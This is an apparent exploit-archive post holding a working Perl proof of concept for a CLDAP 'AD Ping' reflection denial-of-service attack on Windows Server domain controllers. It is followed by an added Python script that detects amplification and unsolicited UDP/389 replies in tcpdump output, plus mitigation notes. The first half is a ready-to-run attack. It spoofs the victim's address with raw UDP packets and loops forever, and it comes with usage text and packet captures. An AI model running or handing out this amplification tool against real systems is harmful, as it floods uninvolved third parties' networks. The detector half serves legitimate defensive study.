Microsoft Windows Server AD LDAP RootDSE Netlogon Denial Of Service
Posted on 05 November 2016
#!/usr/bin/perl
#
# MS Windows Server 2008/2008 R2/ 2012/2012 R2/ AD LDAP RootDSE Netlogon
# (CLDAP "AD Ping") query reflection DoS PoC
#
# Copyright 2016 (c) Todor Donev
# Varna, Bulgaria
# todor.donev@gmail.com
# https://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
# http://pastebin.com/u/hackerscommunity
#
# MS Windows Server 2016 [NOT TESTED !!!]
#
# Description:
# The attacker sends a simple query to a vulnerable reflector
# supporting the Connectionless LDAP service (CLDAP) and using
# address spoofing makes it appear to originate from the intended
# victim. The CLDAP service responds to the spoofed address,
# sending unwanted network traffic to the attacker's intended target.
#
# Amplification techniques allow bad actors to intensify the size
# of their attacks, because the responses generated by the LDAP
# servers are much larger than the attacker's queries. In this case,
# the LDAP service responses are capable of reaching very high
# bandwidth and we have seen an average amplification factor of
# 46x and a peak of 55x.
#
#
# Disclaimer:
# This or previous program is for Educational purpose ONLY. Do not
# use it without permission. The usual disclaimer applies, especially
# the fact that Todor Donev is not liable for any damages caused by
# direct or indirect use of the information or functionality provided
# by these programs. The author or any Internet provider bears NO
# responsibility for content or misuse of these programs or any
# derivatives thereof. By using these programs you accept the fact
# that any damage (dataloss, system crash, system compromise, etc.)
# caused by the use of these programs is not Todor Donev's
# responsibility.
#
# Use at your own risk and educational
# purpose ONLY!
#
# See also, UDP-based Amplification Attacks:
# https://www.us-cert.gov/ncas/alerts/TA14-017A
#
#
# # perl cldapdrdos.pl 192.168.1.112 192.168.1.146
# [ MS Windows Server 2008/2008 R2/ 2012/2012 R2/ AD LDAP RootDSE Netlogon (CLDAP "AD Ping") query reflection DoS PoC
# [ ======
# [ Usg: cldapdrdos.pl <ldap server> <target> <port>
# [ Default port: 389
# [ Example: perl cldapdrdos.pl 192.168.30.56 192.168.1.1
# [ ======
# [ <todor.donev@gmail.com> Todor Donev
# [ Facebook: https://www.facebook.com/ethicalhackerorg
# [ Website: https://www.ethical-hacker.org/
# [ Sending CLDAP "AD Ping" packets..
# ^C
#
# # tcpdump -i eth0 -c4 port 389
# tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
# listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes
# 00:00:58.638466 IP attacker.31337 > target.ldap: UDP, length 57
# 00:00:58.639360 IP target.ldap > attacker.31337: UDP, length 2315 ## LOOOL...
# 00:00:59.039293 IP attacker.31337 > target.ldap: UDP, length 57
# 00:00:59.041043 IP target.ldap > attacker.31337: UDP, length 2315 ## LOOOL...
# 4 packets captured
# 6 packets received by filter
# 0 packets dropped by kernel
#
#

use Net::RawIP;

print "[ MS Windows Server 2008/2008 R2/ 2012/2012 R2/ AD LDAP RootDSE Netlogon (CLDAP \"AD Ping\") query reflection DoS PoC\n";
print "[ ======\n";
print "[ Usg: $0 <ldap server> <target> <port>\n";
print "[ Default port: 389\n";
print "[ Example: perl $0 192.168.30.56 192.168.1.1\n";
print "[ ======\n";
print "[ <todor.donev\@gmail.com> Todor Donev\n";
print "[ Facebook: https://www.facebook.com/ethicalhackerorg\n";
print "[ Website: https://www.ethical-hacker.org/\n";

my $cldap  = $ARGV[0];
my $target = $ARGV[1];
my $port   = $ARGV[2] || '389';

die "[ Error: Port must be between 1 and 65535!\n" if ($port < 1 || $port > 65535);

# CLDAP searchRequest for the RootDSE (base "", scope base, filter
# (objectclass=*)), followed by the "Netlogon" attribute; 57 bytes in total,
# matching the "length 57" seen in the capture above.
my $query  = "\x30\x25\x02\x01\x01\x63\x20\x04\x00\x0a";
$query    .= "\x01\x00\x0a\x01\x00\x02\x01\x00\x02\x01";
$query    .= "\x00\x01\x01\x00\x87\x0b\x6f\x62\x6a\x65";
$query    .= "\x63\x74\x63\x6c\x61\x73\x73\x30\x00\x00";
$query    .= "\x00\x30\x84\x00\x00\x00\x0a\x04\x08\x4e";
$query    .= "\x65\x74\x6c\x6f\x67\x6f\x6e";

my $sock = new Net::RawIP({ udp => {} }) or die;

print "[ Sending CLDAP \"AD Ping\" packets..\n";

while () {
    select(undef, undef, undef, 0.40);  # Sleep 400 milliseconds
    $sock->set({
        ip  => { saddr => $target, daddr => $cldap },
        udp => { source => 31337, dest => $port, data => $query }
    });
    $sock->send;
}
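The capture in the PoC header shows the whole problem from a defender's point of view: a 57-byte UDP/389 query draws a 2315-byte reply, so anyone who can spoof the source address can point that reply at a third party. The script below is an added example and is not part of the original PoC. It parses tcpdump-style summary lines like the ones above (the first four sample lines reuse the PoC's capture verbatim; the remaining lines, hostnames and addresses are constructed), attributes bytes to each CLDAP responder, and flags two things a SOC would want to see: a responder whose reply volume exceeds a chosen ratio of the query volume (an exposed amplifier), and UDP/389 replies arriving with no matching query at all, which is what the spoofed victim observes during a reflection attack. Ratios are computed on UDP payload lengths as tcpdump reports them, so they come out slightly below the on-the-wire factors quoted in the header. The usual mitigations are the ones TA14-017A lists: do not expose domain controllers' UDP/389 to untrusted networks, and deploy ingress filtering (BCP38) so spoofed sources cannot leave the network.

```python
"""Flag CLDAP (UDP/389) amplification and reflection in tcpdump-style lines.

Added example, not part of the original PoC. Sample data is constructed
except for the four lines copied from the PoC's own capture.
"""
import re
from collections import defaultdict

# Matches `tcpdump -n`-style UDP summary lines: "<ts> IP <src>.<sport> > <dst>.<dport>: UDP, length <n>"
LINE_RE = re.compile(
    r"^(?P<ts>\d{2}:\d{2}:\d{2}\.\d+) IP (?P<src>\S+) > (?P<dst>\S+): UDP, length (?P<len>\d+)"
)

CLDAP_PORTS = {"389", "ldap"}  # tcpdump prints the service name when it resolves it
ALERT_RATIO = 10.0             # flag responders answering >= 10x the query volume

SAMPLE_CAPTURE = [
    # Copied from the PoC's capture: 57-byte query, 2315-byte reply.
    "00:00:58.638466 IP attacker.31337 > target.ldap: UDP, length 57",
    "00:00:58.639360 IP target.ldap > attacker.31337: UDP, length 2315",
    "00:00:59.039293 IP attacker.31337 > target.ldap: UDP, length 57",
    "00:00:59.041043 IP target.ldap > attacker.31337: UDP, length 2315",
    # Constructed: a responder whose replies are small; nothing to flag.
    "00:01:00.000000 IP 10.0.0.7.40000 > 10.0.0.20.389: UDP, length 57",
    "00:01:00.001000 IP 10.0.0.20.389 > 10.0.0.7.40000: UDP, length 150",
    # Constructed: what a spoofed victim sees, a reply with no query behind it.
    "00:01:01.000000 IP 198.51.100.5.389 > 203.0.113.9.31337: UDP, length 2315",
    # Constructed noise line that the parser must ignore.
    "tcpdump: verbose output suppressed, use -v or -vv for full protocol decode",
]


def split_endpoint(endpoint):
    """'target.ldap' -> ('target', 'ldap'); '10.0.0.20.389' -> ('10.0.0.20', '389')."""
    host, _, port = endpoint.rpartition(".")
    return host, port


def parse_line(line):
    """Return a dict for a UDP summary line, or None for anything else."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    src, sport = split_endpoint(m.group("src"))
    dst, dport = split_endpoint(m.group("dst"))
    return {"ts": m.group("ts"), "src": src, "sport": sport,
            "dst": dst, "dport": dport, "len": int(m.group("len"))}


def amplification_report(lines, alert_ratio=ALERT_RATIO):
    """Per CLDAP responder: query/response counts and bytes, ratio, and an alert flag.

    A responder with replies but no observed queries gets ratio inf, which is
    the reflection signature seen from the victim side, and is always flagged.
    """
    stats = defaultdict(lambda: {"queries": 0, "query_bytes": 0,
                                 "responses": 0, "response_bytes": 0})
    for line in lines:
        pkt = parse_line(line)
        if pkt is None:
            continue
        if pkt["dport"] in CLDAP_PORTS:       # query toward a CLDAP server
            s = stats[pkt["dst"]]
            s["queries"] += 1
            s["query_bytes"] += pkt["len"]
        elif pkt["sport"] in CLDAP_PORTS:     # reply from a CLDAP server
            s = stats[pkt["src"]]
            s["responses"] += 1
            s["response_bytes"] += pkt["len"]

    report = {}
    for server, s in stats.items():
        ratio = (s["response_bytes"] / s["query_bytes"]) if s["query_bytes"] else float("inf")
        report[server] = dict(s, ratio=round(ratio, 1), alert=ratio >= alert_ratio)
    return report


if __name__ == "__main__":
    for server, s in amplification_report(SAMPLE_CAPTURE).items():
        flag = "ALERT" if s["alert"] else "ok"
        print(f"{server:16} queries={s['queries']} q_bytes={s['query_bytes']} "
              f"replies={s['responses']} r_bytes={s['response_bytes']} ratio={s['ratio']} {flag}")
```

Run against the PoC's own four lines the report gives the responder `target` a ratio of 40.6 on payload bytes and flags it; the constructed `198.51.100.5` entry shows the other face of the same attack, replies with no queries, which is the pattern to alert on at the victim's edge.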